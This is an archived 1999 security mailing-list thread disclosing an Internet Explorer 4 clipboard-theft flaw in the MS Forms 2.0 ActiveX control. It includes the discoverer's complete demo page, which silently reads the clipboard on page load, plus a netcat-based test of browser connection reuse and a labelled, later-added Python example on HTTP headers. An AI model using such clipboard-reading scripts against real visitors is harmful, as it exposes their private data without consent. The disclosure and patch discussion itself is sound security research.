JavaScript can expose Clipboard content in Internet Explorer 4; fix released by Microsoft.
Date: Thu, 21 Jan 1999 15:59:15 +0100
From: Juan Carlos Garcia Cuartango <[email protected]>
To: [email protected]
Subject: New IE4 privacy issue
Greetings,
There is a new IE 4 issue affecting privacy. The clipboard content can be made public by JavaScript code two lines long.
I reported the problem to Microsoft on Jan 7 and they have posted the corresponding security bulletin and a fix today, 21 January.
Although the vulnerability can be exploited from the IE 4 navigator, it is not an IE 4 bug. The problem is located in an ActiveX control called "MS Forms 2.0"
that is shipped and installed with the following applications:
Microsoft Office 97
Microsoft Outlook 98
Microsoft Project 98
Microsoft Visual Basic 5.0
Other non-MS applications based on VB or VBA
More info and a demo are available at:
http://pages.whowhere.com/computers/cuartangojc
The Microsoft security bulletin is:
http://www.microsoft.com/security/bulletins/ms99-001.asp
Regards,
Juan Carlos
----------[ http://pages.whowhere.com/computers/cuartangojc/ ]----------
The Clipboard vulnerability
Internet Explorer 4
Only if you also have installed one of the following applications:
Microsoft Office 97
Microsoft Outlook 98
Microsoft Project 98
Microsoft Visual Basic 5.0
Reported to MS Jan 7 1999
Confirmed and fixed Jan 21 1999.
http://www.microsoft.com/security/bulletins/ms99-001.asp
MS Security Bulletin ms99-001
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords"
content="explorer vulnerability,USP ,Cuartango,cuartango vulnerability, clipboard hole,clipboard ,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>The Clipboard vulnerability demo</title>
</head>
<body onload="GetClipBoard()">
<script>
function GetClipBoard()
{
tb.paste(); // paste over the Microsoft Forms 2.0 TextBox
document.forms(0).S1.value=tb.text; // moves the text to the text area box
if(document.forms(0).S1.value == "")
alert("Your browser does not have the security hole or your clipboard was empty ");
else
alert("Clipboard security hole in browser -- " + navigator.userAgent );
}
</script>
<h1 align="center"><font color="#FF0000"><small>T<strong>he Clipboard Vulnerability Demo</strong></small></font></h1>
<p align="left"><font face="Arial"><small>According to Microsoft security rules, access
to the Windows clipboard content is forbidden to Internet Explorer scripts unless the
clipboard content was owned by the Explorer itself. If a script performs a
"paste" operation over an input text box, the operation will succeed only if the data
were copied to the clipboard from Internet Explorer. </small></font></p>
<p align="left"><small><font face="Arial">There is a way to circumvent this protection by
using a Microsoft Forms 2.0 TextBox ActiveX object. This TextBox object can perform a
"paste" operation without security restrictions. The clipboard data can then be
transferred to a form input box and posted to a malicious Web site. The vulnerability can also
be exploited from an e-mail message.</font></small></p>
<p align="left"><small><font face="Arial">This control does not ship with Windows or with
Internet Explorer, but rather people get it by installing Office 97, Visual Basic 5.0, or
a couple of other applications, although the exposure for most users would be through
Internet Explorer.</font></small></p>
<p align="left"><strong><small><font face="Arial">The box below is an Input Text Area
Box; your clipboard text data must be here. If not, do a copy (from any application)
and reload this page. If this box shows your clipboard content then you are
affected.</font></small></strong></p>
<form method="POST" action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"
S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan --><div
align="center"><center><p><textarea rows="3" name="S1" cols="82"></textarea></p>
</center></div>
</form>
<p align="center"><small><font face="Arial"><strong>The box below (blue) is a Microsoft
Forms 2.0 TextBox ActiveX object; it will also show the clipboard content.</strong></font></small><br>
<br>
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169"
height="23">
<param name="VariousPropertyBits" value="2894088219">
<param name="BackColor" value="16776960">
<param name="Size" value="4480;600">
<param name="FontHeight" value="200">
<param name="FontCharSet" value="0">
<param name="FontPitchAndFamily" value="2">
</object>
</p>
<div align="center"><center>
<table border="0">
<tr>
<td style="border: 1px solid"><p align="left"><font face="Arial"><strong><small>The script
making the clipboard public is very simple:</small></strong><br>
</font><font COLOR="#000000" face="Courier New" size="2"><br>
function GetClipBoard()<br>
{<br>
tb.paste();
// paste over the MS Forms 2.0 TextBox <br>
document.forms(0).S1.value=tb.text; // moves the text to the text area box<br>
}</font></td>
</tr>
</table>
</center></div>
<p align="center"><a href="index.html"><font size="4"><strong>Back to Main Page (More
BUGS)</strong></font></a></p>
<p align="center"><font color="#FF0000">Created by</font> <a
href="mailto:[email protected]">Juan Carlos Garcia Cuartango</a> </p>
</body>
</html>
-----------------------------------------------------------------------------------
Date: Mon, 25 Jan 1999 06:45:37 +0100
From: Drazen Kacar <[email protected]>
To: [email protected]
Subject: Re: IE4 Persistent Connection Bug
Joel Moses wrote:
> The document below details a connection-reuse problem which uses
> persistent connections even when they have either 1) been specifically
> disabled, or 2) have been told to close by a server "Connection:
> close".
[...]
> ------------------------------------------------------------------
> $ nc -p 9000 -l
> GET http://www.somesite.com/ HTTP/1.0
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-excel, application/msword,
> application/vnd.ms-powerpoint, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)
> Host: www.somesite.com
> Proxy-Connection: Keep-Alive
>
> "HTTP/1.1 200 OK"
> "Connection: close"
> "Content-Length: 5"
>
> "abcde"
> ------------------------------------------------------------------
>
> The browser will display "abcde," and the IE logo will stop
> circulating. However, the connection will not -- as requested by the
> server -- close. If you issue another page request in the browser for
You mean "as requested by the origin server." The Connection header is hop-by-hop,
which means that it has a meaning for the connection between the origin server
and the proxy server only. The proxy server doesn't have to propagate it to the
user agent. And there is a Proxy-Connection header in the request.
I don't know where that one is defined (it isn't in RFC 1945, nor in RFC 2068,
nor in the latest HTTP/1.1 draft), but I would assume it has something to do
with open connections between the user agent and the proxy server.
> a different site, the request will come through on this
> previously-opened connection, e.g.,:
>
> ------------------------------------------------------------------
> GET http://www.othersite.com/ HTTP/1.0
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-excel, application/msword,
> application/vnd.ms-powerpoint, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)
> Host: www.othersite.com
> Proxy-Connection: Keep-Alive
> ------------------------------------------------------------------
>
> This clearly violates HTTP/1.0 behavior, with which the browser
> reports to the server that it complies.
It doesn't. Your netcat "proxy" violates it. Here's a quote from RFC 1945:
Except for experimental applications, current practice requires that
the connection be established by the client prior to each request and
closed by the server after sending the response.
> Netscape 4.x behaves correctly and closes the connection itself when
> faced with the same situation.
See above. The server is responsible for closing the connection. Server
here means either the origin server or the proxy server, whichever happens to be
connected to the user agent.
--
.-. .-. Life is a sexually transmitted disease.
(_ \ / _)
| [email protected]
| [email protected]
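Kacar's two points, that Connection is hop-by-hop and that the server side (origin or proxy) is the party that closes, can be checked mechanically. The following Python is an added example, not code from either poster: it parses the quoted request and response, strips the headers a proxy must not forward to the next hop, and decides whether the client-facing connection may stay open under the HTTP/1.0 and HTTP/1.1 rules. The hop-by-hop list follows RFC 2068 section 13.5.1; treating Proxy-Connection as the browser-to-proxy form of Connection is an assumption, since, as Kacar notes, no RFC defines it.

```python
# Added example: hop-by-hop header list per RFC 2068 section 13.5.1, plus
# Proxy-Connection (defined in no RFC; assumed to be the browser-to-proxy
# form of Connection, which is how browsers of the time used it).
HOP_BY_HOP = {"connection", "keep-alive", "public", "proxy-authenticate",
              "transfer-encoding", "upgrade", "proxy-connection"}

def parse_headers(raw):
    """Split the first line from the headers, joining folded continuation lines."""
    lines = raw.strip().splitlines()
    headers, last = {}, None
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and last is not None:  # continuation of previous header
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return lines[0], headers

def tokens(headers, name):
    return {t.strip().lower() for t in headers.get(name, "").split(",") if t.strip()}

def strip_hop_by_hop(headers):
    """Headers a proxy may forward: hop-by-hop ones and anything named in Connection stay behind."""
    drop = HOP_BY_HOP | tokens(headers, "connection") | tokens(headers, "proxy-connection")
    return {k: v for k, v in headers.items() if k not in drop}

def keep_alive(version, req, resp):
    """'close' from either side wins; HTTP/1.0 closes unless both opted in; HTTP/1.1 persists."""
    req_tokens = tokens(req, "connection") | tokens(req, "proxy-connection")
    resp_tokens = tokens(resp, "connection")
    if "close" in req_tokens or "close" in resp_tokens:
        return False
    if version == "HTTP/1.0":
        return "keep-alive" in req_tokens and "keep-alive" in resp_tokens
    return True

# Constructed from the exchange quoted in the thread (continuation lines re-indented).
REQUEST = ("GET http://www.somesite.com/ HTTP/1.0\n"
           "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,\n"
           " application/vnd.ms-excel, application/msword,\n"
           " application/vnd.ms-powerpoint, */*\n"
           "Host: www.somesite.com\n"
           "Proxy-Connection: Keep-Alive\n")
RESPONSE = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: 5\n"
```

For the quoted exchange, `keep_alive("HTTP/1.0", req, resp)` is False, so the proxy (here, the netcat listener) is the side expected to close the socket, and `strip_hop_by_hop(req)` drops Proxy-Connection before anything is forwarded.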
-----------------------------------------------------------------------------------
Date: Mon, 25 Jan 1999 15:14:15 -0000
From: Eamonn Turley <[email protected]>
To: [email protected]
Subject: Re: New IE4 privacy issue
Not just Javascript code.
VB Script, as well.
Anything that can use ActiveX controls, can do it.
This is all of Office, Internet Explorer, Visual Studio (VB, C++ etc),
Netscape Navigator (I believe) and I believe AutoCAD uses VB-Script, so
may be able to do this.